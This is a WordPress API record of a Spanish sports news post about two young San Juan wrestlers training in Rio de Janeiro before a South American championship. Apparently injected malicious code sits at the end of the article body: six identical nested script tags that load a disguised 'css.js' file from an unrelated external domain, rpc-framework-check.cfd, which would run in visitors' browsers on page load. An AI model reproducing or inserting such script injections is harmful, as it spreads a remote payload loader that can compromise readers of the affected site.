{"id":23873,"date":"2025-10-08T12:37:11","date_gmt":"2025-10-08T15:37:11","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=23873"},"modified":"2026-02-02T18:51:50","modified_gmt":"2026-02-02T21:51:50","slug":"anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil","status":"publish","type":"post","link":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/","title":{"rendered":"Anabella Valle y Mateo Valle se preparan para el sudamericano de lucha en Brasil"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Previo al torneo, los sanjuaninos integrantes de la selecci\u00f3n argentina, realizan un campus de entrenamiento en R\u00edo de Janeiro.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Anabella Valle regres\u00f3 a San Juan con una medalla de oro colgada, tras los Juegos Deportivos Evita en Mar del Plata y el mismo d\u00eda parti\u00f3 hacia Brasil junto a Mateo Valle, ambos campeones nacionales en la modalidad Lucha Libre y Beach Wrestling del Torneo Nacional U13, U15, U17 &#8211; Mendoza 2025 y junto a ellos, su pap\u00e1 Diego, entrenador.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ambos luchadores sanjuaninos fueron becados para participar del Campus de Entrenamiento Internacional en el CEFAN &#8211; R\u00edo de Janeiro &#8211; Brasil organizado por CBW, que comenz\u00f3 el lunes pasado y se prolonga hasta el jueves 9 de octubre, previo al Torneo Sudamericano.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El campus est\u00e1 destinado a las categor\u00edas U15, U17, U20 y Senior y en el mismo se realizan entrenamientos, charlas sobre doping, nutrici\u00f3n y capacitaci\u00f3n para los entrenadores; uno de los capacitadores es el cubano Ra\u00fal Trujillo, entrenador de Mijain L\u00f3pez, cinco veces medalla de oro en Olimpiadas.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Finalizado el campus, ser\u00e1 el momento del campeonato Sudamericano de Lucha Ol\u00edmpica en la ciudad de R\u00edo de Janeiro, Brasil, del 10 al 12 de octubre, en el Centro de Educaci\u00f3n F\u00edsica Almirante Adalberto Nunes. Anabella competir\u00e1 en categor\u00eda U15 hasta 66 Kg y Mateo en U17 hasta 92 kg.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Anabella y Mateo son campeones nacionales en la modalidad Lucha Libre y Beach Wrestling del Torneo Nacional U13, U15, U17 &#8211; Mendoza 2025 y se encuentran en Brasil junto al resto de delegaci\u00f3n argentina, integrada, adem\u00e1s, por: Danna Costa (Misiones), El\u00edas Delgado (Misiones), Horacio Miranda (Tierra del Fuego), \u00c1lvaro Miranda (Tierra del Fuego), Benjam\u00edn Casas (C\u00f3rdoba), Aisha Arce (San Luis).<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Previo al torneo, los sanjuaninos integrantes de la selecci\u00f3n argentina, realizan un campus de entrenamiento en R\u00edo de Janeiro. Anabella Valle regres\u00f3 a San Juan con una medalla de oro colgada, tras los Juegos Deportivos Evita en Mar del Plata y el mismo d\u00eda parti\u00f3 hacia Brasil junto a Mateo Valle, ambos campeones nacionales en [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":23874,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[39,178],"tags":[],"class_list":["post-23873","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-automovilismo","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Anabella Valle y Mateo Valle se preparan para el sudamericano de lucha en Brasil - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Anabella Valle y Mateo Valle se preparan para el sudamericano de lucha en Brasil - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"Previo al torneo, los sanjuaninos integrantes de la selecci\u00f3n argentina, realizan un campus de entrenamiento en R\u00edo de Janeiro. Anabella Valle regres\u00f3 a San Juan con una medalla de oro colgada, tras los Juegos Deportivos Evita en Mar del Plata y el mismo d\u00eda parti\u00f3 hacia Brasil junto a Mateo Valle, ambos campeones nacionales en [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-10-08T15:37:11+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T21:51:50+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/10\/3eb79396-1f63-404f-8c16-a862debd50cc.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/#article\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"Anabella Valle y Mateo Valle se preparan para el sudamericano de lucha en Brasil\",\"datePublished\":\"2025-10-08T15:37:11+00:00\",\"dateModified\":\"2026-02-02T21:51:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/\"},\"wordCount\":305,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/3eb79396-1f63-404f-8c16-a862debd50cc.jpeg\",\"articleSection\":[\"Automovilismo\",\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/\",\"name\":\"Anabella Valle y Mateo Valle se preparan para el sudamericano de lucha en Brasil - San Juan Deportes\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/#primaryimage\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/3eb79396-1f63-404f-8c16-a862debd50cc.jpeg\",\"datePublished\":\"2025-10-08T15:37:11+00:00\",\"dateModified\":\"2026-02-02T21:51:50+00:00\",\"breadcrumb\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/#primaryimage\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/3eb79396-1f63-404f-8c16-a862debd50cc.jpeg\",\"contentUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/3eb79396-1f63-404f-8c16-a862debd50cc.jpeg\",\"width\":1600,\"height\":900},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/08\\\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Anabella Valle y Mateo Valle se preparan para el sudamericano de lucha en Brasil\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Anabella Valle y Mateo Valle se preparan para el sudamericano de lucha en Brasil - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/","og_locale":"es_ES","og_type":"article","og_title":"Anabella Valle y Mateo Valle se preparan para el sudamericano de lucha en Brasil - San Juan Deportes","og_description":"Previo al torneo, los sanjuaninos integrantes de la selecci\u00f3n argentina, realizan un campus de entrenamiento en R\u00edo de Janeiro. Anabella Valle regres\u00f3 a San Juan con una medalla de oro colgada, tras los Juegos Deportivos Evita en Mar del Plata y el mismo d\u00eda parti\u00f3 hacia Brasil junto a Mateo Valle, ambos campeones nacionales en [&hellip;]","og_url":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-10-08T15:37:11+00:00","article_modified_time":"2026-02-02T21:51:50+00:00","og_image":[{"width":1600,"height":900,"url":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/10\/3eb79396-1f63-404f-8c16-a862debd50cc.jpeg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/#article","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/"},"author":{"name":"admin","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"Anabella Valle y Mateo Valle se preparan para el sudamericano de lucha en Brasil","datePublished":"2025-10-08T15:37:11+00:00","dateModified":"2026-02-02T21:51:50+00:00","mainEntityOfPage":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/"},"wordCount":305,"commentCount":0,"publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/10\/3eb79396-1f63-404f-8c16-a862debd50cc.jpeg","articleSection":["Automovilismo","San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/#respond"]}]},{"@type":"WebPage","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/","url":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/","name":"Anabella Valle y Mateo Valle se preparan para el sudamericano de lucha en Brasil - San Juan Deportes","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/#primaryimage"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/10\/3eb79396-1f63-404f-8c16-a862debd50cc.jpeg","datePublished":"2025-10-08T15:37:11+00:00","dateModified":"2026-02-02T21:51:50+00:00","breadcrumb":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/#primaryimage","url":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/10\/3eb79396-1f63-404f-8c16-a862debd50cc.jpeg","contentUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/10\/3eb79396-1f63-404f-8c16-a862debd50cc.jpeg","width":1600,"height":900},{"@type":"BreadcrumbList","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/08\/anabella-valle-y-mateo-valle-se-preparan-para-el-sudamericano-de-lucha-en-brasil\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"Anabella Valle y Mateo Valle se preparan para el sudamericano de lucha en Brasil"}]},{"@type":"WebSite","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website","url":"http:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"http:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"http:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23873","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=23873"}],"version-history":[{"count":7,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23873\/revisions"}],"predecessor-version":[{"id":28563,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23873\/revisions\/28563"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/23874"}],"wp:attachment":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=23873"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=23873"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=23873"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}